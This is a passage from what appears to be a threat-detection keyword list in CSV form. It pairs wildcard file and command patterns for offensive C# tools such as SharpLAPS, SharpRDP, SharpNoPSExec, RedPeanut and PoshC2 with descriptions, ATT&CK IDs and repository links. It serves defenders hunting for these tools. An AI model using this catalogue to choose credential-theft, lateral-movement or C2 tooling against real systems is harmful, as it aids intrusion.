TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpLAPS.*,offensive_tool_keyword,SharpLAPS,Retrieve LAPS password from LDAP,T1552.005 - T1212,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/swisskyrepo/SharpLAPS,1,1,N/A,10,4,338,68,2021-02-17T14:32:16Z,2021-02-16T17:27:41Z -*SharpLAPS.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpLAPS-main*,offensive_tool_keyword,SharpLAPS,Retrieve LAPS password from LDAP,T1552.005 - T1212,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/swisskyrepo/SharpLAPS,1,1,N/A,10,4,338,68,2021-02-17T14:32:16Z,2021-02-16T17:27:41Z -*SharpLDAP.csproj*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLDAP.exe*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLDAP.sln*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLDAP-main*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*SharpLdapRelayScan*,offensive_tool_keyword,SharpLdapRelayScan,SharLdapRealyScan is a tool to check 
Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan,T1557.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/klezVirus/SharpLdapRelayScan,1,1,N/A,7,1,72,16,2022-02-26T22:03:11Z,2022-02-12T08:16:59Z -*SharpLdapRelayScan*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*SharpMapExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpMiniDump*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpMiniDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpMiniDumpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpMove.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpNamedPipePTH.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpNoPSExec.csproj*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpNoPSExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpNoPSExec.exe*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpNoPSExec.sln*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral 
movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpNoPSExec-master*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*SharpPack*,offensive_tool_keyword,SharpPack,SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.,T1218.010 - T1218.011 - T1059 - T1127 - T1055,TA0002 - TA0008 - TA0006,N/A,N/A,POST Exploitation tools,https://github.com/mdsecactivebreach/SharpPack,1,0,N/A,N/A,2,145,34,2018-12-17T11:55:12Z,2018-12-17T10:51:19Z -*SharpPrinter.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpPrintNightmare*,offensive_tool_keyword,SharpPrintNightmare,C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527,T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,Exploitation tools,https://github.com/cube0x0/CVE-2021-1675,1,1,N/A,N/A,10,1736,587,2021-07-20T15:28:13Z,2021-06-29T17:24:14Z -*sharpps $psversiontable*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*sharpps get-process*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - 
T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*sharppsexec*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpPsExecManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpPsExecService.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpRDP.*.dll.bin*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDP.csproj*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral 
Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDP.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpRDP.exe*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDP.sln*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDPHijack.cs*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*SharpRDPHijack.exe*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected 
sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*SharpRDPHijack-master*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*SharpRDP-master*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*Sharpreflect *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*SharpReg.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpRoast.exe*,offensive_tool_keyword,Ghostpack-CompiledBinaries,Compiled Binaries for Ghostpack,T1140 - T1559.002 - T1547.002 - T1055 - T1036.004,TA0005 - TA0002 - TA0040 - TA0036,N/A,N/A,Exploitation Tools,https://github.com/r3motecontrol/Ghostpack-CompiledBinaries,1,1,N/A,N/A,9,855,177,2022-11-08T02:58:06Z,2018-07-25T23:38:15Z -*sharpsc *cmd*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpSCCM*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,1,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -*SharpSCCM.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSCShell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*SharpSearch.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSecDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpsecretsdump*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*SharpShares.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpShellPipe.exe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*SharpShellPipe.sln*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB 
protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*SharpShellPipe-main*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*SharpShooter*,offensive_tool_keyword,SharpShooter,Payload Generation Framework,T1027 - T1564 - T1204 - T1059 - T1105,TA0002 - TA0011 - TA0008,N/A,N/A,Frameworks,https://github.com/mdsecactivebreach/SharpShooter,1,1,N/A,N/A,10,1681,352,2022-03-16T15:36:54Z,2018-03-06T20:04:20Z -*SharpShot.exe /*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Sharp-SMBExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSniper.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSocks.exe*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocks.pfx*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocks.resx*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - 